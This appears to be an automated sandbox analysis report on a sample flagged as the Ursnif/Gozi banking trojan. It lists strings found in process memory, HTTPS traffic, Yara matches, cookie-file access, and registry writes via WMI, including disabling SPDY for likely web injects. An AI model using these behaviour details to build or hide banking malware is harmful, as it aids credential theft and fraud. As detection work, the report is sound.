Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000024.00000000.431688638.0000000008BB0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	2_2_054222F7

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027734D0 NtMapViewOfSection,	2_2_027734D0
